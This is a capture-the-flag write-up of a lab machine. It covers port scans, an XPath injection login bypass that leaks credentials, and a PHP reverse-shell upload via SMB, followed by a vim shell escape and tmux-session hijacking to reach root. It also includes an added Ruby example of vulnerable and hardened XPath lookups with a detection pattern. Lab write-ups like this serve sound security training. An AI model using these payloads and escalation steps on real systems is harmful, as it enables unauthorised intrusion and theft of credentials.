Port scanning

nmap --min-rate=10000 -p- 10.10.91.31
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-15 12:46 UTC
Nmap scan report for ip-10-10-91-31.eu-west-1.compute.internal (10.10.91.31)
Host is up (0.0053s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
8082/tcp open blackice-alerts
MAC Address: 02:1E:EF:37:89:5B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 4.03 seconds
nmap -sV -sC -sT -O -p139,445,8080,8082 10.10.91.31
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-15 12:47 UTC
Nmap scan report for ip-10-10-91-31.eu-west-1.compute.internal (10.10.91.31)
Host is up (0.00049s latency).

PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
8080/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache2 Ubuntu Default Page: It works
8082/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 02:1E:EF:37:89:5B (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 3.13 (93%), Linux 3.8 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: INCOGNITO

Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: incognito
| NetBIOS computer name: INCOGNITO\x00
| Domain name: \x00
| FQDN: incognito
|_ System time: 2024-03-15T12:47:23+00:00
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: INCOGNITO, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time:
| date: 2024-03-15T12:47:23
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds

Getting a shell

Scanning SMB with enum4linux gives:

//10.10.91.31/SECURED   Mapping: DENIED Listing: N/A Writing: N/A

But it seems it cannot be connected to directly; credentials are required.

First, the web service on port 8080. Directory scanning turns up /dev, which we are not permitted to access, but it holds a note.txt that apparently hints at a file upload feature? Moving on to the Node.js service on 8082: it is a portal site. The page source contains a comment mentioning /container, but it cannot be reached, and neither can /static; presumably these are functions of the service on port 8082? There is, however, a login page. The room hints at XPath injection, and this login form is the only place it could apply. As this was my first encounter with it and I did not know much about it, I followed

https://book.hacktricks.xyz/pentesting-web/xpath-injection

and entered " or "1"="1 in the username field, which returned:

Username Password
Tove Jani
Godzilla KONGistheKING
SuperMan snyderCut
ArthurMorgan DeadEye
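As an added illustration (not part of the original writeup or of the target application), the following Ruby snippet shows why that payload returns every record: a lookup that interpolates the username into the XPath expression, next to a hardened version that refuses anything outside a strict allowlist, plus a small check that flags such input in request logs. The XML credential store, its element names and the helper names are assumptions; the usernames and passwords are the ones listed above.

```ruby
require 'rexml/document'

# Constructed sample credential store. The usernames and passwords are the
# ones the writeup recovered; the XML layout and element names are assumptions.
USERS_XML = <<~XML
  <users>
    <user><username>Tove</username><password>Jani</password></user>
    <user><username>Godzilla</username><password>KONGistheKING</password></user>
    <user><username>SuperMan</username><password>snyderCut</password></user>
    <user><username>ArthurMorgan</username><password>DeadEye</password></user>
  </users>
XML
USERS_DOC = REXML::Document.new(USERS_XML)

# Hypothetical helper: run an XPath query and return the matched usernames.
def matched_usernames(xpath)
  REXML::XPath.match(USERS_DOC, xpath).map { |u| u.elements['username'].text }
end

# Vulnerable lookup: the request parameter is interpolated straight into the
# expression, so a double quote in the input ends the string literal and the
# rest of the input is parsed as XPath (username="" or "1"="1).
def lookup_vulnerable(user)
  matched_usernames("//user[username=\"#{user}\"]")
end

# Hardened lookup: XPath 1.0 string literals have no escape sequence, so rather
# than trying to sanitise quotes the value is checked against a strict
# allowlist and refused otherwise. Where the XPath library supports variable
# binding (e.g. username=$user), binding is the preferred fix.
USERNAME_RE = /\A[A-Za-z0-9_]{1,32}\z/

def lookup_hardened(user)
  return [] unless user.match?(USERNAME_RE)
  matched_usernames("//user[username=\"#{user}\"]")
end

# Detection aid for web/application logs: flags a login parameter that closes
# a quoted literal and continues with an XPath boolean operator. Coarse by
# design; tune it against your own traffic before alerting on it.
def xpath_injection_like?(value)
  value.match?(/["'].*\b(or|and)\b/i)
end
```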

Going back to the earlier SMB share and trying the four credentials, ArthurMorgan|DeadEye logs in, and the share holds the same note.txt found under /dev on 8080. The first idea was to upload a webshell to get a shell. A test .txt file uploaded fine and could be requested through the web server, so I uploaded a PHP reverse shell, started a listener, requested the file, and got a shell!

Lateral movement

From there we can switch to the ArthurMorgan user and grab the user flag, but looking around there is no obvious privilege-escalation path. Apart from that there is another user, marston.

Uploading pspy to watch processes shows:

python3 /home/marston/hicckup.py
/bin/bash /home/marston/run.sh
tmux new-session -d

But we cannot read either of those two files.

Out of ideas, I took a look at the walkthrough.

env
OPEN_PORT=4545

There is an OPEN_PORT in the environment variables.

nc -lvnp 4545

Then a connection from some program comes in; entering 4 brings up a vim interface. Before doing this, the shell's interactivity needs to be upgraded with Python.

Inside vim, :!/bin/bash gives us marston's identity. run.sh together with hicckup.py is the application that connected back automatically a moment ago.

Privilege escalation

There is also a tmux instance running:

tmux ls
0: 9 windows (created Fri Mar 15 15:04:00 2024) [80x24]

There is a session 0; attach to it:

tmux attach-session -t 0

Then keep typing "exit" until we arrive at a root session!

Closing thoughts

A medium-difficulty box, and still pretty hard. First time running into XPath and tmux; worth digging into when I get the chance.